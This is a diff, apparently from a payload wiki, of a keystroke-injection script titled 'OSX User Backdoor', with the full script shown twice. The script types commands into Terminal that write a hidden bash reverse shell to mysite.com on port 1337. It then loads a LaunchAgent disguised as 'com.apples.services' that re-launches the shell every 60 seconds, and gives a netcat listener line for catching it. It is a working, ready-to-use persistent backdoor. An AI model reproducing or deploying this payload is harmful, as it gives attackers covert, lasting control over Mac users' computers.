JonnyBanana · April 18, 2018 01:54
diff --git a/Payload OSX User Backdoor b/Payload OSX User Backdoor
 EM A simple script for creating a persistent backdoor on OSX.
 REM Change mysite.com to your domain name or IP address
 REM Change 1337 to your port number
 REM Catch the shell with 'nc -l -p 1337'
 REM http://patrickmosca.com/root-a-mac-in-10-seconds-or-less/
 DELAY 1000
 GUI SPACE
 STRING terminal
 DELAY 500
 ENTER
 DELAY 500
 STRING mkdir ~/Library/.hidden
 ENTER
 DELAY 200
 STRING echo '#!/bin/bash
 ENTER
 STRING bash -i >& /dev/tcp/mysite.com/1337 0>&1
 ENTER
 STRING wait' > ~/Library/.hidden/connect.sh
 ENTER
 DELAY 500
 STRING chmod +x ~/Library/.hidden/connect.sh
 ENTER
 DELAY 200
 STRING mkdir ~/Library/LaunchAgents
 ENTER
 DELAY 200
 STRING echo '<plist version="1.0">
 ENTER
 STRING <dict>
 ENTER
 STRING <key>Label</key>
 ENTER
 STRING <string>com.apples.services</string>
 ENTER
 STRING <key>ProgramArguments</key>
 ENTER
 STRING <array>
 ENTER
 STRING <string>/bin/sh</string>
 ENTER
 STRING <string>'$HOME'/Library/.hidden/connect.sh</string>
 ENTER
 STRING </array>
 ENTER
 STRING <key>RunAtLoad</key>
 ENTER
 STRING <true/>
 ENTER
 STRING <key>StartInterval</key>
 ENTER
 STRING <integer>60</integer>
 ENTER
 STRING <key>AbandonProcessGroup</key>
 ENTER
 STRING <true/>
 ENTER
 STRING </dict>
 ENTER
 STRING </plist>' > ~/Library/LaunchAgents/com.apples.services.plist
 ENTER
 DELAY 200
 STRING chmod 600 ~/Library/LaunchAgents/com.apples.services.plist
 ENTER
 DELAY 200
 STRING launchctl load ~/Library/LaunchAgents/com.apples.services.plist
 ENTER
 DELAY 200
 GUI q

 Catch the shell with netcat:

 nc -l -p 1337
	EM A simple script for creating a persistent backdoor on OSX.
	REM Change mysite.com to your domain name or IP address
	REM Change 1337 to your port number
	REM Catch the shell with 'nc -l -p 1337'
	REM http://patrickmosca.com/root-a-mac-in-10-seconds-or-less/
	DELAY 1000
	GUI SPACE
	STRING terminal
	DELAY 500
	ENTER
	DELAY 500
	STRING mkdir ~/Library/.hidden
	ENTER
	DELAY 200
	STRING echo '#!/bin/bash
	ENTER
	STRING bash -i >& /dev/tcp/mysite.com/1337 0>&1
	ENTER
	STRING wait' > ~/Library/.hidden/connect.sh
	ENTER
	DELAY 500
	STRING chmod +x ~/Library/.hidden/connect.sh
	ENTER
	DELAY 200
	STRING mkdir ~/Library/LaunchAgents
	ENTER
	DELAY 200
	STRING echo '<plist version="1.0">
	ENTER
	STRING <dict>
	ENTER
	STRING <key>Label</key>
	ENTER
	STRING <string>com.apples.services</string>
	ENTER
	STRING <key>ProgramArguments</key>
	ENTER
	STRING <array>
	ENTER
	STRING <string>/bin/sh</string>
	ENTER
	STRING <string>'$HOME'/Library/.hidden/connect.sh</string>
	ENTER
	STRING </array>
	ENTER
	STRING <key>RunAtLoad</key>
	ENTER
	STRING <true/>
	ENTER
	STRING <key>StartInterval</key>
	ENTER
	STRING <integer>60</integer>
	ENTER
	STRING <key>AbandonProcessGroup</key>
	ENTER
	STRING <true/>
	ENTER
	STRING </dict>
	ENTER
	STRING </plist>' > ~/Library/LaunchAgents/com.apples.services.plist
	ENTER
	DELAY 200
	STRING chmod 600 ~/Library/LaunchAgents/com.apples.services.plist
	ENTER
	DELAY 200
	STRING launchctl load ~/Library/LaunchAgents/com.apples.services.plist
	ENTER
	DELAY 200
	GUI q

	Catch the shell with netcat:

	nc -l -p 1337